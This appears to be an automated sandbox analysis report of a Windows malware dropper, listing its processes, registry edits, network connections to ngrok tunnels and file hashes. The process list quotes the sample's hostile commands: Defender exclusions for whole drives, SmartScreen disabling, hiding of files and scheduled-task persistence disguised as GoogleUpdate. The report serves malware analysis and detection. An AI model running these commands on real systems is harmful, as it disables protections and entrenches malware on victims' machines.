| Set value (int) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe
"C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe"
C:\Windows\temp\explorer.exe
"C:\Windows\temp\explorer.exe" -p123
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5748.tmp\hide.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe""
C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" +s +h
C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Roaming\*.*" +s +h
C:\Windows\SysWOW64\attrib.exe
attrib *.* +s +h
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath 'c:\','d:\','e:\','f:\'.'j:\'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionProcess 'explorer .exe','UPDATE.exe','googleupdate.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent NeverSend
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9635.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"'
C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe
"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
Files
memory/4264-0-0x00000000003B0000-0x00000000005F0000-memory.dmp
memory/4264-1-0x00007FFF07973000-0x00007FFF07975000-memory.dmp
memory/4264-2-0x000000001B2D0000-0x000000001B520000-memory.dmp
C:\Windows\Temp\explorer.exe
| MD5 | 645c4a1777edc25cbf67a5a5945e3311 |
| SHA1 | 4985ee60a642ecf0be9b60ab137f30d388c2f9f8 |
| SHA256 | f5557bd3226c5973126b6dd4f2b6cf17b672482b38a77dd995ef1e52958b671c |
| SHA512 | 999d55213a7c8cfbdebcffde20e8143113940fc350342e88c3f53f839a0bb39786327bcfe40cc9ea9c5f4e98b94ba4302e8f925e1263e5e05007686e05004775 |
memory/4264-8-0x00007FFF07970000-0x00007FFF08431000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe
| MD5 | 3a7327b010d7f41fdb759fdbaf8134bf |
| SHA1 | ddb00f2c736bad53e82f1ef69919314aaf888131 |
| SHA256 | 519a0fb3e4753c330054153fc8813bbfbac63c7ce32afe110c5dc558ec6909fa |
| SHA512 | 8abfb42add40eadae4aaf5f04edb989f79e6f2d7b080064d488852654f4c17ec08a16cfcfa3947dbf6bf721f113487ef781492d40b281a9a9810946430fd9f90 |
memory/5068-32-0x0000000000BD0000-0x0000000000F7E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
| MD5 | 570c5c4f037ad11d8e3e51d2e9cf5be0 |
| SHA1 | 0f7e2478ef2741f3e6460bf6b5fa6c135a6c0fc8 |
| SHA256 | 0c2b77e6f72dd5736aafaddc75cdee19cde2bd621d0c0c93aae517a29de4e237 |
| SHA512 | 3e5243394ec602098dd11ef77f3ddc0b51d01a8a1ffd829f29b31c237f5e9cf3c011463e619fdc6206bfbee6f0cf43fb681392fd9e1bd35a186e8a059b0beae5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe
| MD5 | 799ce66446d07f987d0e84e50bac4e1f |
| SHA1 | 957f18dd1e9047b36c504752fea23b489dd7c4ae |
| SHA256 | 29eb1c9a192e737c103da9f99ca3e8ed722fe36d5c3073be006867bb0dc58ca2 |
| SHA512 | edd9d33a7fcb765eee0a32a468ac3418f6c23976395b753becafc7bdac160970b89884500d626c5f1476a54f8a3e25bd749c51b956de6ac546efa93a468842de |
memory/3316-44-0x0000000000980000-0x0000000000BB8000-memory.dmp
memory/5068-43-0x0000000000BD0000-0x0000000000F7E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5748.tmp\hide.bat
| MD5 | fdc8f1d8d7b410678433976973ea8e76 |
| SHA1 | 1572ec51ef38b39e4702f993a25cf1cbb5914fda |
| SHA256 | 462648eaf83a1385b957078d3ee40e5c1ffcc00f80cee3456c02a38d992f0c7b |
| SHA512 | b8c6dd7ba66a0867c3fbc8bcacd1ac9fb67e9548174258ca1f7363ca95d3c39771c12cb0b4d121f0d1e9fe6208c00f21c47fb9a4d100351706fb5e0e1f4bcf1e |
memory/2832-50-0x00000000026C0000-0x00000000026F6000-memory.dmp
memory/2832-51-0x0000000005330000-0x0000000005958000-memory.dmp
memory/2832-52-0x00000000050A0000-0x00000000050C2000-memory.dmp
memory/2832-53-0x00000000052C0000-0x0000000005326000-memory.dmp
memory/2832-54-0x0000000005960000-0x00000000059C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vxwgv150.ufi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2832-64-0x00000000059D0000-0x0000000005D24000-memory.dmp
memory/2832-65-0x0000000005FE0000-0x0000000005FFE000-memory.dmp
memory/2832-66-0x0000000006020000-0x000000000606C000-memory.dmp
memory/2832-67-0x0000000006FA0000-0x0000000006FD2000-memory.dmp
memory/2832-68-0x0000000073B00000-0x0000000073B4C000-memory.dmp
memory/2832-78-0x00000000065C0000-0x00000000065DE000-memory.dmp
memory/2832-79-0x00000000071E0000-0x0000000007283000-memory.dmp
memory/2832-81-0x0000000007330000-0x000000000734A000-memory.dmp
memory/2832-80-0x0000000007970000-0x0000000007FEA000-memory.dmp
memory/2832-82-0x00000000073A0000-0x00000000073AA000-memory.dmp
memory/2832-83-0x00000000075B0000-0x0000000007646000-memory.dmp
memory/2832-84-0x0000000007520000-0x0000000007531000-memory.dmp
memory/2832-85-0x0000000007550000-0x000000000755E000-memory.dmp
memory/2832-86-0x0000000007560000-0x0000000007574000-memory.dmp
memory/2832-87-0x0000000007650000-0x000000000766A000-memory.dmp
memory/2832-88-0x0000000007590000-0x0000000007598000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 960561607092b84818eb3b56a7312462 |
| SHA1 | 1e66c8efa39d2bdaac13e133072d98fbdba44877 |
| SHA256 | c3318e5c97eb053791061b68c65a65060c28fa2c1f8479cdaca46529ea0c19ef |
| SHA512 | d23a10386d6a716bd4b0ea3822cd5eb436c8b30f99ec16eae6661be198db162a1032937ff4377af997ac7a9004f814f8c4170329808e11c13efc4b370716aa77 |
memory/4384-102-0x0000000073B00000-0x0000000073B4C000-memory.dmp
memory/5032-113-0x0000000005670000-0x00000000059C4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a62368686a6932cf3b5df2c7069bcb36 |
| SHA1 | f5ce38c79eeb40e85f67b44fb66394222cd16378 |
| SHA256 | 74896ad97b59cce4415968f3e1199dee39547c95e5c1ae05357faec8af60f79b |
| SHA512 | e22eae268e522ee1c64cf0b7f538439e324a7aedcc759122436230fa97f28dfbad6bb557e25610845ea9d59bcae137861aaef711647ba14913d85c4d507a6314 |
memory/5032-124-0x0000000073B00000-0x0000000073B4C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 19134fc9400eec71d9f74a0c79f2dffd |
| SHA1 | dd21822c12f5ef22c0a7e265ef728590824aea5f |
| SHA256 | 55819c92c9b58551d3e01c2a2868e58d1e4619fb14da46182e5accaa886e6501 |
| SHA512 | d56a53cdf522c679b1a0d759c08612212f421f412a1607bbe5a107bd1832f5ad46178c2a2baa0172233e5608e4abb7590b0d6c5ede9257f0cfd267aaf70d26ee |
memory/1656-145-0x0000000073B00000-0x0000000073B4C000-memory.dmp
memory/5068-162-0x0000000000BD0000-0x0000000000F7E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp9635.tmp.bat
| MD5 | 33d6fa6f6e2e2bdd1803dedbde9ed3cf |
| SHA1 | 6d8870a57d572a77ff40caf46673ce77634b6df8 |
| SHA256 | a7e9583d5608f894a2ebf5af1f5d5d62fa01865aaabb70b51b8d7630bf8aebad |
| SHA512 | c2d05de7d63477ad0e5dea4bd8698fb36a7eb6e86fcbfa086ba12fe723e62b345d9f4a41bef928d9ea6464872d1d30a343b842284d4076e4363682b74b45312d |
memory/3920-167-0x0000000000FD0000-0x000000000137E000-memory.dmp
memory/3920-168-0x0000000000FD0000-0x000000000137E000-memory.dmp
memory/4264-169-0x00007FFF07970000-0x00007FFF08431000-memory.dmp
memory/3920-172-0x0000000000FD0000-0x000000000137E000-memory.dmp